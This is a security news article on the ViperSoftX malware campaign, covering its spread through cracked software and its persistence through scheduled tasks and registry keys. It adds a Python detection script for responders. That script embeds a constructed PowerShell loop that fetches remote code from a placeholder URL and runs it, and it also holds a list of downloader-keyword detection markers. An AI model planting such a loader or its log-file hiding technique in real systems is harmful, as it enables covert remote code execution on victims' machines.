TECH - WEB DEVELOPMENT NEWS

Threat Actors Using ViperSoftX Malware to Exfiltrate Sensitive Details

06/06/2025

Korean cybersecurity researchers have uncovered a sophisticated malware campaign targeting cryptocurrency users worldwide, with ViperSoftX emerging as a persistent threat that continues to evolve its attack methodologies.

First identified by Fortinet in 2020, this malware has demonstrated remarkable longevity and adaptability, consistently updating its techniques to bypass security measures while maintaining its core objective of stealing digital assets and sensitive information from infected systems.

The malware primarily spreads through deceptive distribution channels, masquerading as cracked software, key generators for legitimate applications, and even eBooks distributed via torrent sites.

This distribution strategy exploits users’ desire for free software, turning their trust into a vulnerability that threat actors readily exploit.

The campaign has proven especially effective against users who download pirated copies of software, making cracked-software downloads one of the primary initial access tactics observed, alongside exploitation of poorly managed services and malicious email attachments.

ASEC analysts identified that ViperSoftX operators have significantly expanded their arsenal beyond simple cryptocurrency theft, now deploying additional malware families including Quasar RAT for remote access, PureCrypter as an executable loader, and PureHVNC for comprehensive system control.

The researchers noted that while the threat actors are not specifically targeting South Korea, the widespread use of cracked software distribution methods has resulted in numerous confirmed infection cases across the region, highlighting the global reach of this campaign.

Flowchart (Source – ASEC)

The malware’s impact extends beyond individual cryptocurrency theft, as it establishes persistent backdoors that allow threat actors to execute arbitrary commands, download additional payloads, and maintain long-term access to compromised systems.

This creates a cascading security risk where initial cryptocurrency-focused attacks can evolve into comprehensive data breaches and system compromises affecting both individual users and potentially their organizational networks.

Advanced Persistence Mechanisms and System Integration

ViperSoftX demonstrates sophisticated persistence capabilities through its strategic use of Windows Task Scheduler, implementing multiple registration methods to ensure continued execution even after system reboots.

The malware employs at least two distinct persistence techniques, each designed to evade detection while maintaining reliable command and control communication with its operators.

The primary persistence method involves creating scheduled tasks that execute malicious PowerShell scripts through VBScript commands.

These tasks are programmed to read a specific byte range from a seemingly legitimate log file which actually contains Base64-encoded PowerShell code embedded at a predetermined offset.

The malware reads exactly 0x1A6 bytes from offset 0x1F843C of the target file, Base64-decodes the result, and executes it as a PowerShell downloader.

This technique demonstrates the malware’s ability to hide its payload within apparently innocuous system files, making detection significantly more challenging for traditional security tools.

001F8440 62 47 55 67 4B 43 52 30 63 6E 56 6C 4B 53 42 37 bGUgKCR0cnVlKSB7
001F8450 44 51 6F 67 49 43 41 67 64 48 4A 35 49 48 73 4E DQogICAgdHJ5IHSN
001F8460 43 69 41 67 49 43 41 67 49 43 41 67 4A 48 49 67 CiAgICAgICAgJHIg
001F8470 50 53 42 4A 62 6E 5A 76 61 32 55 74 55 6D 56 7A PSBJbnZva2UtUmVz

PowerShell script encoded with Base64 (Source – ASEC)

The encoded PowerShell script shows the malware’s obfuscation approach: executable code is embedded inside what appears to be error message text.

The secondary persistence mechanism uses registry-based storage: PowerShell scripts placed in the %SystemDirectory% path are configured to read encrypted commands from specific registry keys such as “HKLM\SOFTWARE\HPgs6ZtP670 / xr417LXh.”

This dual-layered approach ensures that even if one persistence method is detected and removed, the malware can continue operating through its backup channels, maintaining its foothold on compromised systems while downloading additional payloads and executing threat actor commands.
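As an added illustration of both persistence channels described above (this is editor-supplied example code, not ASEC’s and not the malware’s), the following Python script replays the carve-and-decode step on a constructed log file and then hunts for the same kind of payload in a constructed .reg export. It assumes the article’s “HKLM\SOFTWARE\HPgs6ZtP670 / xr417LXh” pair is a key path and a value name, treats the stored data as plain Base64 as the hex dump shows, and plants a constructed downloader loop of the same shape as the dumped script; the log content, the placeholder URL and every value other than the quoted 0x1F843C/0x1A6 carve parameters are made up.

```python
"""Hunt for Base64-encoded PowerShell hidden in log files and registry values.

Added example, not code from the ASEC write-up or from ViperSoftX. Everything
below is constructed except the carve parameters (offset 0x1F843C, length 0x1A6)
and the registry key/value names quoted in the article.
"""
import base64
import re
from typing import Optional

# Cmdlets and keywords whose presence in decoded text marks a PowerShell downloader.
DOWNLOADER_MARKERS = (
    "Invoke-RestMethod", "Invoke-WebRequest", "DownloadString",
    "Invoke-Expression", "IEX", "Start-BitsTransfer", "Net.WebClient",
)

# A run of Base64 alphabet long enough to be a script rather than a stray token.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

# Constructed downloader loop with the same shape as the dumped script
# ("le ($true) {", "try {", "$r = Invoke-Res..."); the URL is a placeholder.
SAMPLE_SCRIPT = (
    "while ($true) {\r\n"
    "    try {\r\n"
    "        $r = Invoke-RestMethod -Uri 'http://example.invalid/stage2'\r\n"
    "        Invoke-Expression $r\r\n"
    "    } catch {}\r\n"
    "    Start-Sleep -Seconds 60\r\n"
    "}\r\n"
)


def decode_if_powershell(blob: bytes) -> Optional[str]:
    """Return the decoded text if `blob` is Base64 that decodes to PowerShell-like text."""
    try:
        raw = base64.b64decode(blob, validate=True)   # rejects non-alphabet bytes
    except ValueError:                                 # binascii.Error subclasses it
        return None
    for codec in ("utf-8", "utf-16-le"):              # -EncodedCommand payloads are UTF-16LE
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        if any(m in text for m in DOWNLOADER_MARKERS):
            return text
    return None


def carve_at_offset(data: bytes, offset: int, length: int) -> Optional[str]:
    """Replay the malware's own read: `length` bytes at `offset`, then decode.
    The article's values are offset 0x1F843C and length 0x1A6."""
    chunk = data[offset:offset + length]
    if len(chunk) != length:
        return None
    return decode_if_powershell(chunk.strip())


def scan_for_embedded_powershell(data: bytes) -> list[tuple[int, str]]:
    """Offset-agnostic hunt: every long Base64 run in `data` that decodes to PowerShell."""
    hits = []
    for m in B64_RUN.finditer(data):
        text = decode_if_powershell(m.group(0))
        if text is not None:
            hits.append((m.start(), text))
    return hits


_REG_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')


def scan_reg_export(reg_text: str) -> list[tuple[str, str, str]]:
    """Scan a .reg export (Windows Registry Editor 5.00 format) for REG_SZ values
    holding Base64 PowerShell. Returns (key path, value name, decoded script)."""
    hits, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _REG_VALUE.match(line)
        if m and key is not None:
            text = decode_if_powershell(m.group(2).encode())
            if text is not None:
                hits.append((key, m.group(1), text))
    return hits


def build_sample_log(offset: int = 0x1F843C, length: int = 0x1A6) -> bytes:
    """Construct a fake service log with the encoded script planted at `offset`,
    space-padded to exactly `length` bytes so a fixed-window read sees only it."""
    b64 = base64.b64encode(SAMPLE_SCRIPT.encode())
    if len(b64) > length:
        raise ValueError("sample script does not fit the carve window")
    filler = b"2025-06-06 12:00:00 INFO service heartbeat ok\r\n"   # constructed log line
    before = (filler * (offset // len(filler) + 1))[:offset - 2] + b"\r\n"
    return before + b64.ljust(length, b" ") + b"\r\n" + filler * 3


SAMPLE_REG_EXPORT = (   # constructed export; key/value names are those quoted in the article
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\HPgs6ZtP670]\r\n"
    '"xr417LXh"="' + base64.b64encode(SAMPLE_SCRIPT.encode()).decode() + '"\r\n'
)


if __name__ == "__main__":
    log = build_sample_log()
    print("carve   :", carve_at_offset(log, 0x1F843C, 0x1A6) is not None)
    print("scan    :", [hex(off) for off, _ in scan_for_embedded_powershell(log)])
    print("registry:", [(k, n) for k, n, _ in scan_reg_export(SAMPLE_REG_EXPORT)])
```

The offset-specific carve only confirms a sample you already have parameters for; the offset-agnostic scan and the .reg export pass are what a responder would run across a suspect host’s log directory and a registry dump, since the log file name, offset and key name change between builds while the decoded payload still has to contain a download primitive to do its job.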

Source: cybersecuritynews.com

